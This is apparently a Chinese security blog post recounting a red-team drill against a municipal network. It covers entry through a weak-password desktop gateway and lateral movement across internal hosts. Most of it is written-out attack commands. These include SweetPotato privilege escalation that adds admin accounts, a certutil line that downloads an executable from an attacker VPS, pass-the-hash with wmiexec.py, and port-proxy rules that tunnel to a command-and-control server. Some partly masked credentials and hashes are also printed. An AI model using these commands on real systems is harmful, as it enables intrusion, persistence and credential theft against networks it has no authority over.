声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0X00 前言

      记录之前一次地市级HVV实战经历,本次打点比较特殊,不像之前利用一些中间件RCE,历史漏洞,或者文件上传,sql注入拿权限,本次是通过找到一个C段地址的一个端口,发现是一个类似堡垒机的web系统,然后通过阅读操作手册,配置网络进入内网。

0X01 实战过程

1.http://xx.xxxx.xx.x:5000/console/default.asp,弱口令admin,123456登录系统,对该系统进行常规测试,发现上传点无法上传,sql注入也无法利用,本来打算溜溜球的,结果在http://xx.xxxx.xx.x:80端口也发现一个登录口,这个登录口没爆破出账号,但是发现存在一个操作手册下载,下载打开后发现好像是个类似堡垒机的东西,瞬间热血上涌,感觉到了进入内网的希望。

2. 下载了帮助文档发现是个类似云桌面管理的系统,还有客户端下载,下载安装之后发现需要配置网关,然后使用账号密码登录,在5000端口下发现了账号密码,密码默认为111111。

3.这里选了用户1,密码111111,这样连接肯定是连不上的,看了下选项需要配置网关,但是默认网关是内网地址10.xxx.xxx.63:5000

 4.突然想到这个后台还有个网络映射的功能,哈哈哈,那我直接把该网关地址映射到公网地址的5000端口不就行了,事实证明确实可以,成功登录进去,然后在一个电脑图标处发现一个桌面,直接点击进入内网一台主机桌面,幸福来得太突然了。

4.上传一些利用工具到C:UsersPublicDownloads,使用fscan扫描10.152.0.0/16和192.168.0.0/16网段,整理出扫描结果

----------SSH----------

[+] SSH:192.xx.2.2:22:root root

----------mysql----------

[+] mysql:10.xx.xx.80:3306:root 123456

----------mssql----------

[+] mssql:10.xx.xx.237:1433:sa Aa123456

[+] mssql:10.xx.xx.152:1433:sa 11111111

----------poc----------

[+] http://10.xx.xx.77:8000 poc-yaml-jboss-unauth

[+] http://10.xx.xx.80:8085 poc-yaml-druid-monitor-unauth

[+] http://10.xx.xx.19:8000 poc-yaml-jboss-unauth

5.使用frpc.exe进行内网穿透,开启socks5代理:vps:7002,然后使用本机提权工具将10.xxx.xx.237和10.xx.xx.152进行提权,上传提权工具SweetPotato.exe以及木马文件到服务器10.xx.xx.237目录C:/Users/MSSQLSERVER/Desktop,使用命令:

C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net user soutt Sou123 /add"C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net localgroup administrators soutt /add"

6.加管理员账号soutt,soutt2两个账号,远程登录之后使用关闭杀软防护上线CS,提权获取system权限。

7.查看到账号密码文件,使用桌面的数据库管理工具可以直接连接oracle数据库 sys:MES123456

8.同样的方法,在服务器:10.xxx.xxx.152, C:/Users/MSSQLSERVER/上传adduser.exe添加管理员账号,CXK Aa123456

利用JBOSS漏洞上线2台机器管理员权限: 10.xx.xx.77,10.xx.xx.19

Jboss1:10.xx.xx.19:利用Jboss漏洞直接远程添加用户,远程登录成功

9.上线cs：

因为不出网,所以在出网服务器10.xxx.xxx.237上传proxy.exe代理工具,代理http代理10.xxx.xxx.237:8080端口上线内网不出网主机

netsh interface portproxy add v4tov4 listenaddress=10.xx.xx.19 listenport=822(一个没使用的端口) connectaddress=web出网的IP(10.xxx.xxx.237) connectport=8080

流量方向

10.xx.xx.19 → 10.xxx.xxx.237:8080→ C2(vpsIP)

上线成功

Jboss2:使用未授权漏洞进行部署shell,然后通过冰蝎上传adduser.exe,使用jboss利用工具运行获得远程账号CXK Aa123456

C:/temp/adduser.exe

添加用户成功远程连接10.xxx.xxx.77

http://10.xxx.xxx.77:8000/test/test.jsp

同样的http代理上线cs成功

10.使用CS抓取10.x.x.152主机的hash,使用该hash: cce53c7a2f41xxxxxxxf4d3c911875进行pth成功三台主机10.x.x.70,10.x.x.82,10.x.x.149/

11.使用wmiexec.py脚本:

python wmiexec.py -hashes 00000000000000000000000000000000: cce53c7a2f41xxxxxxxf4d3c911875 Administrator@10.xxx.x.82

进行上线82主机,方法一样的,3台主机都是火绒,vps开启python远程下载服务,使用该命令绕过下载adduser.exe即可

copy c:windowssystem32certutil.exe a.exea.exe -urlcache -split -f http://vps:9999/add.exe

12.下载add.exe执行 远程登录这台机器10.xxx.x.82: CXK$,sum%TFys7q

运行添加成功, 10.xxx.x.82: CXK$,sum%TFys7q,然后远程上线cs成功

使用wmiexec.py脚本:

python wmiexec.py -hashes 00000000000000000000000000000000: cce53c7a2f41xxxxxxxf4d3c911875 Administrator@10.xxx.x.70

和进行上线70和149主机,同样的方法,上线成功,10.xxx.x.70:CXK Aa123456

10.xxx.xx.70:CXK$ GYLMzn5dcL

13,上线8台主机,7台管理员权限,一台云桌面,还有一台linux服务器弱口令: 192.168.2.2:22,root,root

对获取权限的主机进行htmlhash破解获得明文账号密码如下:

Administrator kxxxx136  10.xxx.x.70   

Administrator xxxx123 10.xxx.xx.77 |149 |82| 152

Administrator Aa123456 10.xx.xx.237

14.远程登录10.xxx.x.237,使用账号密码administrator: xxxx123发现web.config文件，获取到10.xxx.x.172的mssql数据库账号密码sa,xxx123!@#

15.生成社工密码文件,使用fscan对10.xxx.x.0/24网段进行爆破,爆破出10.xxx.x.152的redis密码xx123456,10.xx.xx.81的mssql用户密码:sa,xxxxx123

16.获得2台msssql服务器权限,和之前提权方式一样,这里不多写了,继续使用获得的密码特征生成特征库,生成密码: xx123!@# , xxx123456,爆破1433端口获得数据库10.xx.x.5 sa kh123!@#,10.xx.x.74 sa kh123!@#,10.xxx.x.19 sa 123456,这里直接利用工具和上述一直获取权限,就不上cs了

17.一共获得的数据库如下:

0X03 总结

    本次主要是工作组环境,多拿机器,多拿数据库,然后刷分就好了,中间的过程其实都是基本操作。

原文始发于微信公众号（夜安团队SEC）：HVV实战-一次有意思的打点突破